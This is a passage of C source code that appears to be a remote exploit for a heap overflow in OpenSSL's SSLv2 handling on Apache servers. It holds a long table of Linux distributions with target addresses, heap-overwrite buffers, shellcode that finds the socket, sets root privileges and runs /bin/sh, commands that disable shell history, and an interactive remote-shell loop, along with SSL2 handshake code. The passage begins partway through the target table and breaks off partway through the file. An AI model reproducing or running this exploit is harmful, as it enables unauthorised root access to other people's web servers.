"Mandrake Linux 7.2 (apache-1.3.14) 2",
|
|
0x0809d6c4
|
|
},
|
|
{
|
|
"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
|
|
0x0809ccde
|
|
},
|
|
{
|
|
"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
|
|
0x0809ce14
|
|
},
|
|
{
|
|
"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
|
|
0x0809d262
|
|
},
|
|
{
|
|
"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
|
|
0x08083545
|
|
},
|
|
{
|
|
"Mandrake Linux 8.0 (apache-1.3.19-3)",
|
|
0x0809ea98
|
|
},
|
|
{
|
|
"Mandrake Linux 8.1 (apache-1.3.20-3)",
|
|
0x0809e97c
|
|
},
|
|
{
|
|
"Mandrake Linux 8.2 (apache-1.3.23-4)",
|
|
0x08086580
|
|
},
|
|
{ "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
|
|
0x08086484
|
|
},
|
|
{ "Mandrake Linux 8.2 (apache-1.3.24)",
|
|
0x08086665
|
|
},
|
|
{
|
|
"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
|
|
0x0808c0f4
|
|
},
|
|
{
|
|
"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
|
|
0x080d2c35
|
|
},
|
|
{
|
|
"RedHat Linux 4.2 (apache-1.1.3-3)",
|
|
0x08065bae
|
|
},
|
|
{
|
|
"RedHat Linux 5.0 (apache-1.2.4-4)",
|
|
0x0808c82c
|
|
},
|
|
{
|
|
"RedHat Linux 5.1-Update (apache-1.2.6)",
|
|
0x08092a45
|
|
},
|
|
{
|
|
"RedHat Linux 5.1 (apache-1.2.6-4)",
|
|
0x08092c2d
|
|
},
|
|
{
|
|
"RedHat Linux 5.2 (apache-1.3.3-1)",
|
|
0x0806f049
|
|
},
|
|
{
|
|
"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
|
|
0x0808e4d8
|
|
},
|
|
{
|
|
"RedHat Linux 6.0 (apache-1.3.6-7)",
|
|
0x080707ec
|
|
},
|
|
{
|
|
"RedHat Linux 6.0 (apache-1.3.6-7)",
|
|
0x080707f9
|
|
},
|
|
{
|
|
"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
|
|
0x0808fd52
|
|
},
|
|
{
|
|
"RedHat Linux 6.0 Update (apache-1.3.24)",
|
|
0x80acd58
|
|
},
|
|
{
|
|
"RedHat Linux 6.1 (apache-1.3.9-4)1",
|
|
0x0808ccc4
|
|
},
|
|
{
|
|
"RedHat Linux 6.1 (apache-1.3.9-4)2",
|
|
0x0808ccdc
|
|
},
|
|
{
|
|
"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
|
|
0x0808fd5d
|
|
},
|
|
{
|
|
"RedHat Linux 6.1-fp2000 (apache-1.3.26)",
|
|
0x082e6fcd
|
|
},
|
|
{
|
|
"RedHat Linux 6.2 (apache-1.3.12-2)1",
|
|
0x0808f689
|
|
},
|
|
{
|
|
"RedHat Linux 6.2 (apache-1.3.12-2)2",
|
|
0x0808f614
|
|
},
|
|
{
|
|
"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
|
|
0x0808f9ec
|
|
},
|
|
{
|
|
"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
|
|
0x0808f9d4
|
|
},
|
|
{
|
|
"Redhat Linux 7.x (apache-1.3.22)",
|
|
0x0808400c
|
|
},
|
|
{
|
|
"RedHat Linux 7.x (apache-1.3.26-1)",
|
|
0x080873bc
|
|
},
|
|
{ "RedHat Linux 7.x (apache-1.3.27)",
|
|
0x08087221
|
|
},
|
|
{
|
|
"RedHat Linux 7.0 (apache-1.3.12-25)1",
|
|
0x0809251c
|
|
},
|
|
{
|
|
"RedHat Linux 7.0 (apache-1.3.12-25)2",
|
|
0x0809252d
|
|
},
|
|
{
|
|
"RedHat Linux 7.0 (apache-1.3.14-2)",
|
|
0x08092b98
|
|
},
|
|
{
|
|
"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
|
|
0x08084358
|
|
},
|
|
{
|
|
"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
|
|
0x0808438c
|
|
},
|
|
{
|
|
"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
|
|
0x08086e41
|
|
},
|
|
{
|
|
"RedHat Linux 7.1 (apache-1.3.19-5)1",
|
|
0x0809af8c
|
|
},
|
|
{
|
|
"RedHat Linux 7.1 (apache-1.3.19-5)2",
|
|
0x0809afd9
|
|
},
|
|
{
|
|
"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
|
|
0x0808438c
|
|
},
|
|
{
|
|
"RedHat Linux 7.1-Update (1.3.22-5.7.1)",
|
|
0x08084389
|
|
},
|
|
{
|
|
"RedHat Linux 7.1 (apache-1.3.22-src)",
|
|
0x0816021c
|
|
},
|
|
{
|
|
"RedHat Linux 7.1-Update (1.3.27-1.7.1)",
|
|
0x08086ec89
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache-1.3.20-16)1",
|
|
0x080994e5
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache-1.3.20-16)2",
|
|
0x080994d4
|
|
},
|
|
{
|
|
"RedHat Linux 7.2-Update (apache-1.3.22-6)",
|
|
0x08084045
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache-1.3.24)",
|
|
0x80b0938
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache-1.3.26)",
|
|
0x08161c16
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache-1.3.26-snc)",
|
|
0x8161c14
|
|
},
|
|
{
|
|
|
|
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
|
|
0x08269950
|
|
},
|
|
{
|
|
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
|
|
0x08269988
|
|
},
|
|
{
|
|
"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
|
|
0x08086af9
|
|
},
|
|
{
|
|
"RedHat Linux 7.3 (apache-1.3.23-11)1",
|
|
0x0808528c
|
|
},
|
|
{
|
|
"RedHat Linux 7.3 (apache-1.3.23-11)2",
|
|
0x0808525f
|
|
},
|
|
{ "RedHat Linux 8.0 (apache-1.3.27)",
|
|
0x08084c1c
|
|
},
|
|
{ "RedHat Linux 8.0-second (apache-1.3.27)",
|
|
0x0808151e
|
|
},
|
|
{
|
|
"Slackware Linux 4.0 (apache-1.3.6)",
|
|
0x08088130
|
|
},
|
|
{
|
|
"Slackware Linux 7.0 (apache-1.3.9)",
|
|
0x080a7fc0
|
|
},
|
|
{
|
|
"Slackware Linux 7.0 (apache-1.3.26)",
|
|
0x083d37fc
|
|
},
|
|
{ "Slackware 7.0 (apache-1.3.26)2",
|
|
0x083d2232
|
|
},
|
|
{
|
|
"Slackware Linux 7.1 (apache-1.3.12)",
|
|
0x080a86a4
|
|
},
|
|
{
|
|
"Slackware Linux 8.0 (apache-1.3.20)",
|
|
0x080ae67c
|
|
},
|
|
{
|
|
"Slackware Linux 8.1 (apache-1.3.24)",
|
|
0x080b0c60
|
|
},
|
|
{
|
|
"Slackware Linux 8.1 (apache-1.3.26)",
|
|
0x080b2100
|
|
},
|
|
|
|
{
|
|
"Slackware Linux 8.1-stable (apache-1.3.26)",
|
|
0x080b0c60
|
|
},
|
|
{ "Slackware Linux (apache-1.3.27)",
|
|
0x080b1a3a
|
|
},
|
|
{
|
|
"SuSE Linux 7.0 (apache-1.3.12)",
|
|
0x0809f54c
|
|
},
|
|
{
|
|
"SuSE Linux 7.1 (apache-1.3.17)",
|
|
0x08099984
|
|
},
|
|
{
|
|
"SuSE Linux 7.2 (apache-1.3.19)",
|
|
0x08099ec8
|
|
},
|
|
{
|
|
"SuSE Linux 7.3 (apache-1.3.20)",
|
|
0x08099da8
|
|
},
|
|
{
|
|
"SuSE Linux 8.0 (apache-1.3.23)",
|
|
0x08086168
|
|
},
|
|
{
|
|
"SUSE Linux 8.0 (apache-1.3.23-120)",
|
|
0x080861c8
|
|
},
|
|
{
|
|
"SuSE Linux 8.0 (apache-1.3.23-137)",
|
|
0x080861c8
|
|
},
|
|
{
|
|
"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
|
|
0xfd42630
|
|
},
|
|
|
|
/*
|
|
* Offset still unchecked
|
|
* some guys giveme them
|
|
*/
|
|
|
|
{
|
|
"RedHat Linux 6.0 (apache-1.3.6-7)",
|
|
0x080707ec
|
|
},
|
|
{
|
|
"RedHat Linux 6.1 (apache-1.3.9-4)",
|
|
0x0808ccc4
|
|
},
|
|
{
|
|
"RedHat Linux 6.2 (apache-1.3.12-2)",
|
|
0x0808f614
|
|
},
|
|
{
|
|
"RedHat Linux 7.0 (apache-1.3.12-25)",
|
|
0x0809251c
|
|
},
|
|
{
|
|
"RedHat Linux 7.1 (apache-1.3.19-5)",
|
|
0x0809af8c
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache-1.3.20-16)",
|
|
0x080994d4
|
|
},
|
|
{
|
|
"RedHat Linux 7.2 (apache 1.3.26-src)",
|
|
0x08161c14
|
|
},
|
|
{
|
|
"RedHat Linux 7.3 (apache-1.3.23-11)",
|
|
0x0808528c
|
|
},
|
|
{
|
|
"SuSE Linux 7.0 (apache-1.3.12)",
|
|
0x0809f54c
|
|
},
|
|
{
|
|
"SuSE Linux 7.1 (apache-1.3.17)",
|
|
0x08099984
|
|
},
|
|
{
|
|
"SuSE Linux 7.2 (apache-1.3.19)",
|
|
0x08099ec8
|
|
},
|
|
{
|
|
"SuSE Linux 7.3 (apache-1.3.20)",
|
|
0x08099da8
|
|
},
|
|
{
|
|
"SuSE Linux 8.0 (apache-1.3.23)",
|
|
0x08086168
|
|
},
|
|
{
|
|
"SuSE Linux 8.0 (apache-1.3.23) second",
|
|
0x080861c8
|
|
},
|
|
{
|
|
"Mandrake Linux 7.1 (apache-1.3.14-2)",
|
|
0x0809d6c4
|
|
},
|
|
{
|
|
"Mandrake Linux 8.0 (apache-1.3.19-3)",
|
|
0x0809ea98
|
|
},
|
|
{
|
|
"Mandrake Linux 8.1 (apache-1.3.20-3)",
|
|
0x0809e97c
|
|
},
|
|
{
|
|
"Mandrake Linux 8.2 (apache-1.3.23-4)",
|
|
0x08086580
|
|
},
|
|
{
|
|
"Slackware 7.1 (apache-1.3.26)",
|
|
0x083d37fc
|
|
},
|
|
{
|
|
"Slackware 8.0 (apache-1.3.22)",
|
|
0x08102b78
|
|
},
|
|
{
|
|
"Slackware 8.1 (apache-1.3.26)",
|
|
0x080b2100
|
|
},
|
|
|
|
};
|
|
|
|
extern int errno;
|
|
|
|
int cipher;
|
|
int ciphers;
|
|
|
|
/* the offset of the local port from be beginning of the overwrite next chunk buffer */
|
|
#define FINDSCKPORTOFS 208 + 12 + 46
|
|
|
|
unsigned char overwrite_session_id_length[] =
|
|
"AAAA" /* int master key length; */
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH];
|
|
*/
|
|
"\x70\x00\x00\x00"; /* unsigned int session id length; */
|
|
|
|
unsigned char overwrite_next_chunk[] =
|
|
"AAAA" /* int master key length; */
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH];
|
|
*/
|
|
"AAAA" /* unsigned int session id length; */
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
|
|
"AAAA" /* unsigned int sid ctx length; */
|
|
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
|
|
"AAAA" /* int not resumable; */
|
|
"\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
|
|
"\x00\x00\x00\x00" /* X509 *peer; */
|
|
"AAAA" /* long verify result; */
|
|
"\x01\x00\x00\x00" /* int references; */
|
|
"AAAA" /* int timeout; */
|
|
"AAAA" /* int time */
|
|
"AAAA" /* int compress meth; */
|
|
"\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
|
|
"AAAA" /* unsigned long cipher id; */
|
|
"\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
|
|
"AAAAAAAA" /* struct ssl session st *prev,*next; */
|
|
|
|
"\x00\x00\x00\x00" /* Size of previous chunk */
|
|
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
|
|
"fdfd" /* Forward and back pointers */
|
|
"bkbk"
|
|
"\x10\x00\x00\x00" /* Size of previous chunk */
|
|
"\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */
|
|
|
|
/* shellcode start */
|
|
"\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
|
|
"\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */
|
|
|
|
/* 72 bytes findsckcode by LSD-pl */
|
|
"\x31\xdb" /* xorl %ebx,%ebx */
|
|
"\x89\xe7" /* movl %esp,%edi */
|
|
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
|
|
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
|
|
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
|
|
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
|
|
"\xb3\x10" /* movb $0x10,%bl */
|
|
"\x89\x19" /* movl %ebx,(%ecx) */
|
|
"\x31\xc9" /* xorl %ecx,%ecx */
|
|
"\xb1\xff" /* movb $0xff,%cl */
|
|
"\x89\x0f" /* movl %ecx,(%edi) */
|
|
"\x51" /* pushl %ecx */
|
|
"\x31\xc0" /* xorl %eax,%eax */
|
|
"\xb0\x66" /* movb $0x66,%al */
|
|
"\xb3\x07" /* movb $0x07,%bl */
|
|
"\x89\xf9" /* movl %edi,%ecx */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x59" /* popl %ecx */
|
|
"\x31\xdb" /* xorl %ebx,%ebx */
|
|
"\x39\xd8" /* cmpl %ebx,%eax */
|
|
"\x75\x0a" /* jne <findsckcode+54> */
|
|
"\x66\xb8\x12\x34" /* movw $0x1234,%bx */
|
|
"\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
|
|
"\x74\x02" /* je <findsckcode+56> */
|
|
"\xe2\xe0" /* loop <findsckcode+24> */
|
|
"\x89\xcb" /* movl %ecx,%ebx */
|
|
"\x31\xc9" /* xorl %ecx,%ecx */
|
|
"\xb1\x03" /* movb $0x03,%cl */
|
|
"\x31\xc0" /* xorl %eax,%eax */
|
|
"\xb0\x3f" /* movb $0x3f,%al */
|
|
"\x49" /* decl %ecx */
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x41" /* incl %ecx */
|
|
"\xe2\xf6" /* loop <findsckcode+62> */
|
|
|
|
/* 10 byte setresuid(0,0,0); by core */
|
|
"\x31\xc9" /* xor %ecx,%ecx */
|
|
"\xf7\xe1" /* mul %ecx,%eax */
|
|
"\x51" /* push %ecx */
|
|
"\x5b" /* pop %ebx */
|
|
"\xb0\xa4" /* mov $0xa4,%al */
|
|
"\xcd\x80" /* int $0x80 */
|
|
|
|
|
|
/* bigger shellcode added by spabam */
|
|
|
|
/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
|
|
"\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
|
|
*/
|
|
|
|
|
|
/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
|
|
"\x31\xc0" /* xorl %eax,%eax */
|
|
"\x50" /* pushl %eax */
|
|
"\x68""//sh" /* pushl $0x68732f2f */
|
|
"\x68""/bin" /* pushl $0x6e69622f */
|
|
"\x89\xe3" /* movl %esp,%ebx */
|
|
"\x50" /* pushl %eax */
|
|
"\x53" /* pushl %ebx */
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
|
"\x99" /* cdql */
|
|
"\xb0\x0b" /* movb $0x0b,%al */
|
|
"\xcd\x80"; /* int $0x80 */
|
|
|
|
/* read and write buffer*/
|
|
#define BUFSIZE 16384
|
|
|
|
/* hardcoded protocol stuff */
|
|
#define CHALLENGE_LENGTH 16
|
|
#define RC4_KEY_LENGTH 16 /* 128 bits */
|
|
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
|
|
|
|
/* straight from the openssl source */
|
|
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
|
|
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
|
|
|
|
/* we keep all SSL2 state in this structure */
|
|
typedef struct {
|
|
int sock;
|
|
|
|
/* client stuff */
|
|
unsigned char challenge[CHALLENGE_LENGTH];
|
|
unsigned char master_key[RC4_KEY_LENGTH];
|
|
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
|
|
|
|
/* connection id - returned by the server */
|
|
int conn_id_length;
|
|
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
|
|
|
|
/* server certificate */
|
|
X509 *x509;
|
|
|
|
/* session keys */
|
|
unsigned char* read_key;
|
|
unsigned char* write_key;
|
|
RC4_KEY* rc4_read_key;
|
|
RC4_KEY* rc4_write_key;
|
|
|
|
/* sequence numbers, used for MAC calculation */
|
|
int read_seq;
|
|
int write_seq;
|
|
|
|
/* set to 1 when the SSL2 handshake is complete */
|
|
int encrypted;
|
|
} ssl_conn;
|
|
|
|
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
|
|
#define COMMAND2 "unset HISTFILE; uname -a; id; echo SPABAM R0X; pwd; w;\n"
|
|
|
|
long getip(char *hostname) {
|
|
struct hostent *he;
|
|
long ipaddr;
|
|
|
|
if ((ipaddr = inet_addr(hostname)) < 0) {
|
|
if ((he = gethostbyname(hostname)) == NULL) {
|
|
perror("gethostbyname()");
|
|
exit(-1);
|
|
}
|
|
memcpy(&ipaddr, he->h_addr, he->h_length);
|
|
}
|
|
return ipaddr;
|
|
}
|
|
|
|
/* mixter's code w/enhancements by core */
|
|
|
|
int sh(int sockfd) {
|
|
char snd[1024], rcv[1024];
|
|
fd_set rset;
|
|
int maxfd, n;
|
|
|
|
/* Priming commands */
|
|
strcpy(snd, COMMAND1 "\n");
|
|
write(sockfd, snd, strlen(snd));
|
|
|
|
strcpy(snd, COMMAND2 "\n");
|
|
write(sockfd, snd, strlen(snd));
|
|
|
|
/* Main command loop */
|
|
for (;;) {
|
|
FD_SET(fileno(stdin), &rset);
|
|
FD_SET(sockfd, &rset);
|
|
|
|
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
|
|
select(maxfd, &rset, NULL, NULL, NULL);
|
|
|
|
if (FD_ISSET(fileno(stdin), &rset)) {
|
|
bzero(snd, sizeof(snd));
|
|
fgets(snd, sizeof(snd)-2, stdin);
|
|
write(sockfd, snd, strlen(snd));
|
|
}
|
|
|
|
if (FD_ISSET(sockfd, &rset)) {
|
|
bzero(rcv, sizeof(rcv));
|
|
|
|
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
|
|
printf("Good Bye!\n");
|
|
return 0;
|
|
}
|
|
|
|
if (n < 0) {
|
|
perror("read");
|
|
return 1;
|
|
}
|
|
|
|
fputs(rcv, stdout);
|
|
fflush(stdout); /* keeps output nice */
|
|
}
|
|
} /* for(;;) */
|
|
}
|
|
|
|
/* Returns the local port of a connected socket */
|
|
int get_local_port(int sock)
|
|
{
|
|
struct sockaddr_in s_in;
|
|
unsigned int namelen = sizeof(s_in);
|
|
|
|
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
|
|
printf("Can't get local port: %s\n", strerror(errno));
|
|
exit(1);
|
|
}
|
|
|
|
return s_in.sin_port;
|
|
}
|
|
|
|
/* Connect to a host */
|
|
int connect_host(char* host, int port)
|
|
{
|
|
struct sockaddr_in s_in;
|
|
int sock;
|
|
|
|
s_in.sin_family = AF_INET;
|
|
s_in.sin_addr.s_addr = getip(host);
|
|
s_in.sin_port = htons(port);
|
|
|
|
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
|
|
printf("Could not create a socket\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
|
|
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
|
|
exit(1);
|
|
}
|
|
|
|
return sock;
|
|
}
|
|
|
|
/* Create a new ssl conn structure and connect to a host */
|
|
ssl_conn* ssl_connect_host(char* host, int port)
|
|
{
|
|
ssl_conn* ssl;
|
|
|
|
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
|
|
printf("Can't allocate memory\n");
|
|
exit(1);
|
|
}
|
|
|
|
/* Initialize some values */
|
|
ssl->encrypted = 0;
|
|
ssl->write_seq = 0;
|
|
ssl->read_seq = 0;
|
|
|
|
ssl->sock = connect_host(host, port);
|
|
|
|
return ssl;
|
|
}
|
|
|
|
/* global buffer used by the ssl result() */
|
|
char res_buf[30];
|
|
|
|
/* converts an SSL error code to a string */
|
|
char* ssl_error(int code) {
|
|
switch (code) {
|
|
case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
|
|
case 0x01: return "SSL2 PE NO CIPHER (0x01)";
|
|
case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
|
|
case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)";
|
|
case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
|
|
default:
|
|
sprintf(res_buf, "%02x", code);
|
|
return res_buf;
|
|
}
|
|
}
|
|
|
|
/* read len bytes from a socket. boring. */
|
|
int read_data(int sock, unsigned char* buf, int len)
|
|
{
|
|
int l;
|
|
int to_read = len;
|
|
|
|
do {
|
|
if ((l = read(sock, buf, to_read)) < 0) {
|
|
printf("Error in read: %s\n", strerror(errno));
|
|
exit(1);
|
|
}
|
|
to_read -= len;
|
|
} while (to_read > 0);
|
|
|
|
return len;
|
|
}
|
|
|
|
/* reads an SSL packet and decrypts it if necessery */
|
|
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
|
|
{
|
|
int rec_len, padding;
|
|
|
|
read_data(ssl->sock, buf, 2);
|
|
|
|
if ((buf[0] & 0x80) == 0) {
|
|
/* three byte header */
|
|
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
|
|
read_data(ssl->sock, &buf[2], 1);
|
|
padding = (int)buf[2];
|
|
}
|
|
else {
|
|
/* two byte header */
|
|
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
|
|
padding = 0;
|
|
}
|
|
|
|
if ((rec_len <= 0) || (rec_len > buf_size)) {
|
|
printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
|
|
exit(1);
|
|
}
|
|
|
|
read_data(ssl->sock, buf, rec_len);
|
|
|
|
if (ssl->encrypted) {
|
|
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
|
|
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
|
|
/* the server didn't switch to encryption due to an error */
|
|
return 0;
|
|
}
|
|
else {
|
|
printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
/* decrypt the encrypted part of the packet */
|
|
RC4(ssl->rc4_read_key, rec_len, buf, buf);
|
|
|
|
/* move the decrypted message in the beginning of the buffer */
|
|
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
|
|
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
|
|
}
|
|
|
|
if (buf[0] == SSL2_MT_ERROR) {
|
|
if (rec_len != 3) {
|
|
printf("Malformed server error message\n");
|
|
exit(1);
|
|
}
|
|
else {
|
|
return 0;
|
|
}
|
|
}
|
|
|
|
return rec_len;
|
|
}
|
|
|
|
/* send an ssl packet, encrypting it if ssl->encrypted is set */
|
|
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
|
|
{
|
|
unsigned char buf[BUFSIZE];
|
|
unsigned char* p;
|
|
int tot_len;
|
|
MD5_CTX ctx;
|
|
int seq;
|
|
|
|
|
|
if (ssl->encrypted)
|
|
tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
|
|
else
|
|
tot_len = rec_len;
|
|
|
|
if (2 + tot_len > BUFSIZE) {
|
|
printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
|
|
exit(1);
|
|
}
|
|
|
|
p = buf;
|
|
s2n(tot_len, p);
|
|
|
|
buf[0] = buf[0] | 0x80; /* two byte header */
|
|
|
|
if (ssl->encrypted) {
|
|
/* calculate the MAC */
|
|
seq = ntohl(ssl->write_seq);
|
|
|
|
MD5_Init(&ctx);
|
|
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
|
|
MD5_Update(&ctx, rec, rec_len);
|
|
MD5_Update(&ctx, &seq, 4);
|
|
MD5_Final(p, &ctx);
|
|
|
|
p+=MD5_DIGEST_LENGTH;
|
|
|
|
memcpy(p, rec, rec_len);
|
|
|
|
/* encrypt the payload */
|
|
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
|
|
|
|
}
|
|
else {
|
|
memcpy(p, rec, rec_len);
|
|
}
|
|
|
|
send(ssl->sock, buf, 2 + tot_len, 0);
|
|
|
|
/* the sequence number is incremented by both encrypted and plaintext packets
|
|
*/
|
|
ssl->write_seq++;
|
|
}
|
|
|
|
/* Send a CLIENT HELLO message to the server */
|
|
void send_client_hello(ssl_conn *ssl)
|
|
{
|
|
int i;
|
|
unsigned char buf[BUFSIZE] =
|
|
"\x01" /* client hello msg */
|
|
|
|
"\x00\x02" /* client version */
|
|
"\x00\x18" /* cipher specs length */
|
|
"\x00\x00" /* session id length */
|
|
"\x00\x10" /* challenge length */
|
|
|
|
"\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
|
|
"\x80\x01\x00\x80\x08\x00\x80\x06"
|
|
"\x00\x40\x04\x00\x80\x02\x00\x80"
|
|
|
|
""; /* session id data */
|
|
|
|
/* generate CHALLENGE LENGTH bytes of challenge data */
|
|
for (i = 0; i < CHALLENGE_LENGTH; i++) {
|
|
ssl->challenge[i] = (unsigned char) (rand() >> 24);
|
|
}
|
|
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
|
|
|
|
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
|
|
}
|
|
|
|
/* Get a SERVER HELLO response from the server */
|
|
void get_server_hello(ssl_conn* ssl)
|
|
{
|
|
unsigned char buf[BUFSIZE];
|
|
unsigned char *p, *end;
|
|
int len;
|
|
int server_version, cert_length, cs_length, conn_id_length;
|
|
int found;
|
|
|
|
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
|
|
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
|
|
exit(1);
|
|
}
|
|
if (len < 11) {
|
|
printf("get_server_hello: Packet too short (len = %d)\n", len);
|
|
exit(1);
|
|
}
|
|
|
|
p = buf;
|
|
|
|
if (*(p++) != SSL2_MT_SERVER_HELLO) {
|
|
printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
|
|
exit(1);
|
|
}
|
|
|
|
if (*(p++) != 0) {
|
|
printf("get_server_hello: SESSION-ID-HIT is not 0\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (*(p++) != 1) {
|
|
printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
|
|
exit(1);
|
|
}
|
|
|
|
n2s(p, server_version);
|
|
if (server_version != 2) {
|
|
printf("get_server_hello: Unsupported server version %d\n", server_version);
|
|
exit(1);
|
|
}
|
|
|
|
n2s(p, cert_length);
|
|
n2s(p, cs_length);
|
|
n2s(p, conn_id_length);
|
|
|
|
if (len != 11 + cert_length + cs_length + conn_id_length) {
|
|
printf("get_server_hello: Malformed packet size\n");
|
|
exit(1);
|
|
}
|
|
|
|
/* read the server certificate */
|
|
ssl->x509 = NULL;
|
|
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
|
|
if (ssl->x509 == NULL) {
|
|
printf("get server hello: Cannot parse x509 certificate\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (cs_length % 3 != 0) {
|
|
printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
|
|
exit(1);
|
|
}
|
|
|
|
found = 0;
|
|
for (end=p+cs_length; p < end; p += 3) {
|
|
if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
|
|
found = 1; /* SSL CK RC4 128 WITH MD5 */
|
|
}
|
|
|
|
if (!found) {
|
|
printf("get server hello: Remote server does not support 128 bit RC4\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
|
|
printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
|
|
exit(1);
|
|
}
|
|
|
|
/* The connection id is sent back to the server in the CLIENT FINISHED packet */
|
|
ssl->conn_id_length = conn_id_length;
|
|
memcpy(ssl->conn_id, p, conn_id_length);
|
|
}
|
|
|
|
/* Send a CLIENT MASTER KEY message to the server */
|
|
|
|
